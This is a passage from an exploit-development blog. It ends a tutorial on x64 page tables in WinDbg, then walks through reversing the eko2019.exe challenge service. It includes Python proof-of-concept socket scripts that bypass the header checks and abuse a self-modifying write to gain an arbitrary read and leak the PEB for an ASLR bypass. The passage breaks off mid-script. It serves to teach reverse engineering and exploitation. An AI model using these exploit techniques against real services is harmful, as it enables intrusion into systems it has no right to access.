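pte_coverage = PAGE_SIZE                            # what one PTE maps
pde_coverage = pte_coverage * ENTRIES_PER_TABLE     # one PDE covers a full PT
pdpe_coverage = pde_coverage * ENTRIES_PER_TABLE    # one PDPE covers a full PDT
pml4e_coverage = pdpe_coverage * ENTRIES_PER_TABLE  # one PML4E covers a full PDPT
total_coverage = pml4e_coverage * ENTRIES_PER_TABLE # the whole PML4

print("PTE   :", pte_coverage // KB, "KB")
print("PDE   :", pde_coverage // MB, "MB")
print("PDPE  :", pdpe_coverage // GB, "GB")
print("PML4E :", pml4e_coverage // GB, "GB")
print("Total :", total_coverage // TB, "TB")
```

The final figure is the same 256 TB limit that canonical addressing imposes, since 512 * 512 * 512 * 512 * 4 KB is 2 to the power of 48 bytes.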

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).

Let’s talk about the PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which serves as the PML4 table base. This can be seen in the image below, where CR3 loads an actual physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, the PML4 (via the CR3 register) indexes the PDPT table and fetches an entry. The PDPT indexes the base of the PDT table and fetches an entry. The PDT table indexes the PT table and fetches a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed in bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset into a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base to another location). Here, the base is the start of the 4 KB physical page that the PTE points to, and bits 11-0 are the distance from that base to the exact byte being accessed. We will see this outlined very shortly when we perform a page translation in WinDbg.
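
To make the bit ranges concrete, here is a minimal Python 3 sketch that splits a virtual address into its four table indexes and its page offset, using the ranges listed earlier in this post. The function name split_virtual_address is invented for this example, and the input is the KERNELBASE!VirtualProtect address shown earlier.

```python
def split_virtual_address(va):
    """Split a 48-bit virtual address into paging indexes and page offset."""
    return {
        "pml4_index": (va >> 39) & 0x1FF,  # bits 47-39
        "pdpt_index": (va >> 30) & 0x1FF,  # bits 38-30
        "pdt_index": (va >> 21) & 0x1FF,   # bits 29-21
        "pt_index": (va >> 12) & 0x1FF,    # bits 20-12
        "offset": va & 0xFFF,              # bits 11-0
    }


parts = split_virtual_address(0x00007FFCE032CFC0)
for name, value in parts.items():
    print("{0:<11} {1}".format(name, hex(value)))
```

Each index is 9 bits wide, which is exactly enough to select one of the 512 entries in a table, and the 12 bit offset is exactly enough to select one byte in a 4 KB page.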

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to note before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.

In order to reach our goal, right now we only care about pfn which we can see from the !pte output. Let’s understand what the pfn means firstly, as this will help us understand the output of !pte and fetching a physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E , as we know, will fetch the base address of the PDPT table. From there, it will index an entry from the next table, known as a PDPE.

As we can see from the WinDbg output in the earlier screenshot, the PFN that the PML4E is using to locate the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the PDPT to a physical address to verify that the PML4E entry is indexing the correct paging structure.

Let’s break down this command firstly.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000- which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both are the same.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multiplied by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!
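
The arithmetic from the last few paragraphs fits in a couple of lines of Python 3. This sketch uses the PFN 7bbc8 and the two virtual addresses mentioned above; the helper name physical_address is an assumption for illustration.

```python
PAGE_SIZE = 0x1000  # 4 KB


def physical_address(pfn, virtual_address):
    """Physical address = PFN * 0x1000 + the low 12 bits of the virtual address."""
    offset = virtual_address & 0xFFF
    return pfn * PAGE_SIZE + offset


# The base of the PDPT: no offset, so the PFN is simply "appended with 0's".
print(hex(physical_address(0x7BBC8, 0xFFFFF6FB7DA00000)))

# The same page, 8 bytes in.
print(hex(physical_address(0x7BBC8, 0xFFFFF6FB7DA00008)))
```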

Awesome, we now know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs- For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to “control bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

Here is a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P - The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a “dirty” page
  5. A - If this bit is set, this memory page has been referenced at some point
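
To tie the control bits back to the raw entry, here is a hedged Python 3 sketch that decodes the PTE value 7A9000007BBA9867 from the !pte output above. The bit positions are the standard x64 ones (P is bit 0, R/W is bit 1, U/S is bit 2, A is bit 5, D is bit 6). Treating bits 12-47 as the frame number is an assumption of this sketch, and the function name decode_pte is made up for the example.

```python
# Standard x64 positions for the control bits listed above.
CONTROL_BITS = {"P": 0, "R/W": 1, "U/S": 2, "A": 5, "D": 6}


def decode_pte(value):
    """Return (pfn, flags) for a raw 8-byte page table entry."""
    # Assumption: the page frame number sits in bits 12-47 (36 bits).
    pfn = (value >> 12) & ((1 << 36) - 1)
    flags = {name: bool((value >> bit) & 1) for name, bit in CONTROL_BITS.items()}
    return pfn, flags


pfn, flags = decode_pte(0x7A9000007BBA9867)
print("pfn:", hex(pfn))
for name, is_set in flags.items():
    print("{0:<4} {1}".format(name, "set" if is_set else "clear"))
```

The decoded frame number should line up with the pfn line in the !pte output, and the set bits with the letters WinDbg prints next to it.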

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive “tell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00

Introduction

I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact that I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will “read in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the “header” has been received, and prints the value of local_258.

printf(s__[+]_Header_received:_%i_bytes_14000c008,(ulonglong)local_258)

We can interpret this behavior as that eko2019.exe seems to accept a header before the “message” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first “check” the application makes on our request, thus being the first “check” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should be 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior indicates that the string Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.
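
A quick way to convince yourself of this is to pack the constant as a little-endian 8 byte integer and look at the bytes. This is a small Python 3 sketch, and the variable names are only for illustration. The 8 filler bytes appended at the end are the same \x90 padding used by the proof of concept later in this post.

```python
import struct

MAGIC = 0x393130326F6B45  # the constant local_28 is compared against

# "<Q" packs an unsigned 8-byte integer in little-endian byte order,
# which is how the value sits in memory on x64.
header_magic = struct.pack("<Q", MAGIC)
print(header_magic)

# The header must be 16 bytes in total, so 8 more bytes follow the magic.
header = header_magic + b"\x90" * 8
print(len(header))
```

The missing eighth byte of the constant shows up as the trailing null, which is why the string has to be null terminated.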

This is how this check is executed, in IDA.

Number three, the value of the variable local_20 is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data received in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The value of local_258, which at this point is the size of our message (not the header), is shifted to the right by 0x1f (31) bits, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement (local_258 + uVar2 & 7) == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same formula above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not have gone through (since 0x199 is not a multiple of 8)!
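
The two worked examples above can be reproduced with a short Python 3 model of the decompiled check. This is a sketch under a stated assumption: local_258 is treated as a signed 32-bit integer, which is what the (int) cast in the decompiler output suggests. The helper names to_int32 and passes_alignment_check are made up for this example.

```python
def to_int32(value):
    """Interpret the low 32 bits of value as a signed 32-bit integer."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


def passes_alignment_check(local_258):
    """Model of: uVar2 = (int)local_258 >> 0x1f & 7;
                 if ((local_258 + uVar2 & 7) == uVar2)"""
    signed = to_int32(local_258)
    # Python's >> on a negative int is an arithmetic shift, like the C code.
    uvar2 = (signed >> 0x1F) & 7
    return ((signed + uvar2) & 7) == uvar2


for size in (0x200, 0x199):
    print(hex(size), "passes" if passes_alignment_check(size) else "fails")
```

For any positive size, uVar2 is 0, so the check boils down to testing that the low 3 bits of the size are clear.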

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();
WriteProcessMemory(hProcess,FUN_140001000,local_250,8,&local_260);

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According to Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
);

  • hProcess in this case will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There is something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the address of the unknown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location, indexed by RAX (the address read from is RCX + RAX * 8), is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks like in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe.

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)
s.recv(1024)
s.close()

Before sending this proof of concept, let’s make sure a breakpoint is set at eko2019.exe+0x1330 (sub_140001330), as this is where we should land after our header is sent.

After sending our proof of concept, we can see we hit our breakpoint.

In addition to execution pausing, it seems as though we also control 0x1f8 bytes on the stack (504 decimal).

Let’s keep stepping through instructions, to see where we get!

After stepping through a few instructions, execution lands at this instruction, shown below.

lea rcx,[eko2019+0xe520 (00007ff6`6641e520)]

This instruction loads the address of eko2019.exe+0xe520 into RCX. Looking back, we recall the following is the disassembly from IDA that corresponds to our current instruction.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If we examine what is located at eko2019.exe+0xe520, we come across some interesting data, shown below.

It seems as though this value, 00488b01c3c3c3c3, will be loaded into RCX. This is very interesting, as we know that c3 bytes are that of a “return” instruction. What is of even more interest, is the first byte is set to zero. Since we know RAX is going to be tacked on to this value, it seems as though whatever is in RAX is going to complete this string! Let’s step through the instruction that does this.

RAX is currently set to 0x3e

The following instruction is executed, as shown below.

mov rcx, [rcx+rax*8]

RCX now contains the QWORD read from the address RCX + RAX * 8!

Nice! This value is now going to be passed to the sub_140001170 (eko2019.exe+0x1170) function.

As we know, most of the time a function executes- the value it returns is placed in the accumulator register (RAX in this case). Take a look at the image below, which shows what value the sub_140001170 (eko2019.exe+0x1170) function returns.

Interesting! It seems as though the call to sub_140001170 (eko2019.exe+0x1170) inverted our bytes!

Based off of the research we have done previously, it is evident that this is the QWORD that is going to be written to sub_140001000 via the WriteProcessMemory() routine!
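
To picture what “inverting” a QWORD looks like, here is a tiny Python 3 sketch. It assumes the inversion is a plain byte-order reversal of the 8 byte value, which is an interpretation and not something confirmed by the disassembly shown here. It uses the value 00488b01c3c3c3c3 seen at eko2019.exe+0xe520 as sample input, and the helper name swap_qword_bytes is made up.

```python
import struct


def swap_qword_bytes(value):
    """Reverse the byte order of an 8-byte value (assumed behaviour)."""
    return int.from_bytes(value.to_bytes(8, "big"), "little")


original = 0x00488B01C3C3C3C3
swapped = swap_qword_bytes(original)
print(hex(swapped))

# When the swapped value is stored to memory on a little-endian machine,
# the bytes land in the same order in which the original value reads.
print(struct.pack("<Q", swapped).hex())
```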

As we can see below, the next item up for execution (that is of importance) is the GetCurrentProcess() routine, which will return a handle to the current process (eko2019.exe) into RAX, similarly to how the last function returned its value into RAX.

Taking a look into RAX, we can see a value of ffffffffffffffff. This represents the current process! For instance, if we wanted to call WriteProcessMemory() outside of a debugger in the C programming language for example, specifying the first function argument as ffffffffffffffff would represent the current process- without even needing to obtain a handle to the current process! This is because technically GetCurrentProcess() returns a “pseudo handle” to the current process. A pseudo handle is a special constant of (HANDLE)-1, or ffffffffffffffff.
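
If it is not obvious why -1 shows up as ffffffffffffffff, the following Python 3 lines show the two's complement view of -1 in a 64-bit register. This is only arithmetic for illustration and does not call any Windows API.

```python
# -1 truncated to 64 bits, which is how (HANDLE)-1 looks in RAX.
pseudo_handle = -1 & 0xFFFFFFFFFFFFFFFF

print("{0:016x}".format(pseudo_handle))
```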

All that is left now, is to step through up until the call to WriteProcessMemory() to verify everything will write as expected.

Now that WriteProcessMemory() is about to be called- let’s take a look at the arguments that will be used in the function call.

Under the x64 __fastcall calling convention, the first four arguments are passed in RCX, RDX, R8, and R9. The fifth argument is located at RSP + 0x20, and each subsequent argument is placed 8 bytes after the last (e.g. RSP + 0x28, RSP + 0x30, etc. Remember, we are doing hexadecimal math here!).

Awesome! As we can see from the above image, WriteProcessMemory() is going to write the value returned by sub_140001170 (eko2019.exe+0x1170), which R8 points to (R8 holds lpBuffer), to the location of sub_140001000 (eko2019.exe+0x1000).
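
As a memory aid, the argument placement described above can be written down as a small Python 3 lookup. It models where each argument lives at the moment of the call instruction, for integer and pointer arguments only. The function name argument_location is invented for this sketch, and the parameter names come from the WriteProcessMemory() prototype shown earlier.

```python
REGISTER_ARGS = ["RCX", "RDX", "R8", "R9"]  # first four integer/pointer args


def argument_location(n):
    """Where the n-th argument (1-based) lives at the time of the call."""
    if n < 1:
        raise ValueError("argument numbers start at 1")
    if n <= 4:
        return REGISTER_ARGS[n - 1]
    # The fifth argument sits at RSP + 0x20, then 8 bytes per argument.
    return "RSP+0x{0:x}".format(0x20 + 8 * (n - 5))


params = ["hProcess", "lpBaseAddress", "lpBuffer", "nSize",
          "lpNumberOfBytesWritten"]
for number, name in enumerate(params, start=1):
    print("{0:<24} {1}".format(name, argument_location(number)))
```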

After this function is executed, the location to which WriteProcessMemory() wrote to is called, as outlined by the image below.

Cool! This function received the buffer from the sub_140001170 (eko2019.exe+0x1170) function call. When those bytes are interpreted by the disassembler, you can see from the image above- this 8 byte QWORD is interpreted as an instruction that moves the value pointed to by RCX into RAX (with the NOPs we previously discovered with IDA)! The function returns the value in RAX and that is the end of execution!

Is there any way we can abuse this functionality?

Curiosity Killed The Cat? No, It Just Turned The Application Into One Big Info Leak

We know that when sub_140001000 (eko2019.exe+0x1000) is called, the value pointed to by RCX is placed into RAX and then the function returns this value. Since the program is now done accepting and returning network data to clients, it would be logical that perhaps the value in RAX may be returned to the client over a network connection, since the function is done executing! After all, this is a client/server architecture. Let’s test this theory, by updating our proof of concept.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.132", 54321))
s.sendall(exploit)

# Can we receive any data back?
test = s.recv(1024)
test_unpack = struct.unpack_from('<Q', test)
test_index = test_unpack[0]

print "[+] Did we receive any data back from the server? If so, here it is: {0}".format(hex(test_index))

# Closing the connection
s.close()

What this updated code will do is read in 1024 bytes from the server response. Then, the struct.unpack_from() function will interpret the data received back in the response from the server in the form of an unsigned long long (8 byte integer basically). This data is then indexed at its “first” position and formatted into hex and printed!
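One caveat with the snippet above: on a TCP socket, recv(1024) is allowed to hand back fewer bytes than were sent, so the 8 bytes we want are not guaranteed to arrive in one call. Here is a minimal sketch of a more defensive read, written for Python 3. The names recv_exact, recv_qword, and FakeSocket are hypothetical helpers, not part of the original exploit, and FakeSocket only exists so the example runs without a server.

```python
import struct

def recv_exact(sock, count):
    """Read exactly `count` bytes from any object that has a recv() method."""
    data = b""
    while len(data) < count:
        chunk = sock.recv(count - len(data))
        if not chunk:
            raise EOFError("connection closed after {0} bytes".format(len(data)))
        data += chunk
    return data

def recv_qword(sock):
    """Interpret the first 8 bytes of the response as a little-endian unsigned QWORD."""
    return struct.unpack("<Q", recv_exact(sock, 8))[0]

class FakeSocket(object):
    """Hypothetical stand-in that returns data a few bytes at a time."""
    def __init__(self, data, piece=3):
        self.data = data
        self.piece = piece

    def recv(self, n):
        take = min(n, self.piece)
        out, self.data = self.data[:take], self.data[take:]
        return out

# 0x21d is the value seen in RAX earlier in the post
leak = recv_qword(FakeSocket(struct.pack("<Q", 0x21d)))
print(hex(leak))
```

In the real script, the socket `s` would be passed to recv_qword() in place of the fake one.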

If you recall from the previous image in the last section that outlined the mov rax, qword ptr [rcx] operation in the sub_140001000 function, you will see the value that was moved into RAX was 0x21d. If everything goes as planned, when we run this script- that value should be printed to the screen in our script! Let’s test it out.

Awesome! As you can see, we were able to extract and view the contents of the returned value of the function call to sub_140001000 (eko2019.exe+0x1000) remotely (aka RAX)! This means that we can obtain some type of information leakage (although, it is not particularly useful at the moment).

As reverse engineers, vulnerability researchers, and exploit developers- we are taught never to accept things at face value! Although eko2019.exe tells us that we are not supposed to send a message longer than 512 bytes- let’s see what happens when we send a value greater than 512! Adhering to the restriction about our data being in a multiple of 8, let’s try sending 528 bytes (in just the message) to the server!

Interesting! The application crashes! However, before you jump to conclusions- this is not the result of a buffer overflow. The root cause is something different! Let’s now identify where this crash occurs and why.

Let’s reattach eko2019.exe to WinDbg and view the execution right before the call to sub_140001170 (eko2019.exe+0x1170).

Again, execution is paused right before the call to sub_140001170 (eko2019.exe+0x1170)

At this point, the value of RAX is about to be added to the following data again.

Let’s check out the contents of the RAX register, to see what is going to get tacked on here!

Very interesting! It seems as though we now actually control the byte in RAX- just by increasing the number of bytes sent! Now, if we step through the WriteProcessMemory() function call that will write this string and call it later on, we can see that this is why the program crashes.

As you can see, execution of our program landed right before the move instruction, which takes the contents pointed to by RCX and places it into RAX. As we can see below, this was not an access violation because of DEP- but because it is obviously an invalid pointer. DEP doesn’t apply here, because we are not executing from the stack.

This is all fine and dandy- but the REAL issue can be identified by looking at the state of the registers.

This is the exciting part- we actually control the contents of the RCX register! This essentially gives us an arbitrary read primitive due to the fact we can control what gets loaded into RCX, extract its contents into RAX, and return it remotely to the client! There are four things we need to take into consideration:

  1. Where are the bytes in our message buffer that get stored into RCX?
  2. What exactly should we load into RCX?
  3. Where is the byte that comes before the mov rax, qword ptr [rcx] instruction located?
  4. What should we change said byte to?

Let’s address numbers three and four in the above list firstly.

Bytes Bytes Baby

In a previous post about ROP, we talked about the concept of byte splitting. Let’s apply that same concept here! For instance, \x41 is an opcode, that when combined with the opcodes \x48\x8b\x01 (which makes up the move instruction in eko2019.exe we are talking about) does not produce a variant of said instruction.

Let’s put our brains to work for a second. We have an information leak currently- but we don’t have any use for it at the moment. As is common, let’s leverage this information leak to bypass ASLR! To do this, let’s start by trying to access the Process Environment Block, commonly referred to as the PEB, for the current process (eko2019.exe)! The PEB for a process is the user mode representation of a process, similarly to how _EPROCESS is the kernel mode representation of a process.

Why is this relevant, you ask? Since we have the ability to extract the pointer from a location in memory, we should be able to use our byte splitting primitive to our advantage! The PEB for the current process can be accessed through a special segment register, GS, at an offset of 0x60. Recall from the previous of two posts about kernel shellcode, that a segment register is just a register that is used to access different types of data structures (such as the PEB of the current process). The PEB, as will be explained later, contains some very pertinent information that can be leveraged to turn our information leak into a full ASLR bypass.

We can potentially replace the \x41 in front of our previous mov rax, qword ptr [rcx] instruction, and change it to create a variant of said instruction, mov rax, qword ptr gs:[rcx]! This would also mean, however, that we would need to set RCX to 0x60 at the time of this instruction.

Recall that we have the ability to control RCX at this time! This is ideal, because we can use our ability to control RCX to load the value of 0x0000000000000060 into it- and access the GS segment register at this offset!

After some research, it seems as though the bytes \x65\x48\x8b\x01 are used to create the instruction mov rax, qword ptr gs:[rcx]. This means we need to replace the \x41 byte that caused our access violation with a \x65 byte! Firstly, however, we need to identify where this byte is within our proof of concept.

Updating our proof of concept, we found that the byte we need to replace with \x65 is at an offset of 512 into our 528 byte buffer. Additionally, the bytes that control the value of RCX seem to come right after said byte! This was all found through trial and error.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

